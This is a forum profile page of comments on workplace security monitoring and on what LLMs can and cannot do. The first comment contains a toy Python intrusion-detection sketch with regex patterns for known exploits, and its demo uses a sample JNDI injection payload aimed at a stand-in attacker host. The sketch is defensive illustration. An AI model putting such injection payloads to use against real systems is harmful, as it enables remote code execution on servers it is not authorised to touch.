He / They

  • 1 Post
  • 281 Comments
Joined 1 year ago
Cake day: June 16th, 2023

  • Speaking as an infosec professional, security monitoring software should be targeted at threats, not at the user. We want to know the state of the laptop as it relates to the safety of the data on that machine. We don’t, and in healthy workplaces can’t, determine what an employee is doing that does not behaviorally conform to a threat.

    Yes, if a user repeatedly gets virus detections around 9pm, we can infer what’s going on, but we aren’t tracking the websites they visit, because the AUP is structured around impacts/outcomes, not actions alone.

    As an example, we don’t care if you run a Python exploit, we care if you run it against a machine you don’t have authorization to access (i.e., violating the CFAA). So we don’t scan your files against exploitdb; we watch for unusual network traffic that conforms to known exploits, and capture that request information (a toy sketch of that kind of signature check follows at the end of this comment).

    So if you try to pentest pornhub, we’ll know. But if you just visit it in Firefox, we won’t.

    We’re not prison guards, like these schools apparently think they are, we’re town guards.
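
    A minimal sketch of that kind of signature check, for illustration only: the rule patterns, hosts, and function names below are invented, not any real IDS ruleset, but the shape is the same: match the traffic against known-exploit patterns and capture the request, without caring what site the user was browsing.

    ```python
    import re

    # Toy "known exploit" signatures: regexes over request payloads. Real
    # detection rulesets (Suricata/Snort etc.) are far richer; these patterns
    # are made up purely to illustrate the approach.
    SIGNATURES = {
        "jndi lookup in request (log4shell-style)": re.compile(r"\$\{jndi:(ldap|rmi|dns)://", re.IGNORECASE),
        "classic SQL injection probe": re.compile(r"('\s*or\s*'1'\s*=\s*'1|union\s+select)", re.IGNORECASE),
        "path traversal": re.compile(r"\.\./\.\./"),
    }

    def inspect_request(src_ip: str, dst_host: str, payload: str) -> list[dict]:
        """Return an alert for each known-exploit pattern seen in the payload.

        Nothing here records which sites the user browsed; it only reacts to
        traffic that conforms to a known exploit, and captures that request.
        """
        alerts = []
        for rule, pattern in SIGNATURES.items():
            if pattern.search(payload):
                alerts.append({
                    "rule": rule,
                    "src": src_ip,
                    "dst": dst_host,
                    "evidence": payload[:200],
                })
        return alerts

    if __name__ == "__main__":
        # Plain browsing raises nothing; an exploit attempt does.
        print(inspect_request("10.0.0.5", "example.com", "GET /index.html HTTP/1.1"))
        print(inspect_request("10.0.0.5", "target.example",
                              "GET /?q=${jndi:ldap://attacker.example/a} HTTP/1.1"))
    ```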






  • the purpose of my car is to get me from place to place

    No, that was its purpose for you, the reason you chose to buy it. Someone else could have chosen to buy a car to live in, for example. The purpose of a tool is just to be a tool. A hammer’s purpose isn’t just to hit nails; it’s to be a heavy thing you can use as needed. You could hit a person with it, or straighten out dents in a metal sheet, or destroy a hard drive. I think you’re conflating the intended use of something with its purpose for existing, and it’s leading you to assert that the purpose of LLMs is one specific use only.

    An LLM is never going to be a fact-retrieval engine, but it has plenty of legitimate uses: generating creative text is very useful. Just because OpenAI is selling their creative-text engine under false pretenses doesn’t invalidate the technology itself.

    I think we can all agree that it did a thing they didn’t want it to do, and that an LLM by itself may not be the correct tool for the job.

    Sure, 100% they are using/selling the wrong tool for the job, but the tool is not malfunctioning.




  • Except Lvxferre is actually correct: LLMs are not capable of determining what is useful or not useful, nor can they ever be; that limitation is fundamental to how their models work. They are simply strings of weighted tokens/numbers. The LLM does not “know” anything; it is approximating text similar to what it was trained on.

    It would be like training a parrot and then being upset that, when you ask it questions, it doesn’t understand what the words mean and just gives you back the words it was trained on.

    The only way to ensure they produce only useful output is to screen their answers against a known-good database of information, at which point you don’t need the AI model anyway (the sketch at the end of this comment illustrates both the weighted-token point and this screening step).

    A software bug is not about what was intended at the design level; it’s about what was intended at the developer level. If the program doesn’t do what the developer intended when they wrote the code, that’s a bug. If the developer coded the program to do something different than what the manager requested, that’s not a bug in the software, that’s a management issue.

    Right now LLMs are doing exactly what they’re being coded to do. The disconnect is the companies selling them to customers as something other than what they are coding them to do. And they’re doing it because the company heads don’t want to admit what their actual limitations are.
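
    A minimal sketch of both points, with an invented next-token distribution and an invented known-good fact table (nothing here is a real model or API): the "model" is nothing but weighted tokens to sample from, and the screening step only works because we already hold the correct answer, which is why the model adds nothing for fact retrieval.

    ```python
    import random

    # Made-up next-token weights an LLM might assign after the prompt
    # "The capital of Australia is". The model stores only weights like these;
    # there is no fact lookup behind them.
    NEXT_TOKEN_WEIGHTS = {
        "Canberra": 0.55,
        "Sydney": 0.35,    # plausible-sounding but wrong continuations get weight too
        "Melbourne": 0.10,
    }

    # A known-good reference the screening step trusts (also invented here).
    KNOWN_FACTS = {"capital of Australia": "Canberra"}

    def sample_next_token(weights: dict[str, float]) -> str:
        """Pick a token in proportion to its weight; that is all the model itself does."""
        tokens = list(weights)
        return random.choices(tokens, weights=[weights[t] for t in tokens], k=1)[0]

    def screened_answer(question_key: str) -> str:
        """Generate a token, then screen it against the known-good database.

        The screen can only accept or reject; the correct answer has to come
        from the database we already had, not from the model.
        """
        candidate = sample_next_token(NEXT_TOKEN_WEIGHTS)
        if candidate == KNOWN_FACTS[question_key]:
            return candidate
        return f"rejected {candidate!r}: not in the known-good database"

    if __name__ == "__main__":
        for _ in range(5):
            print(screened_answer("capital of Australia"))
    ```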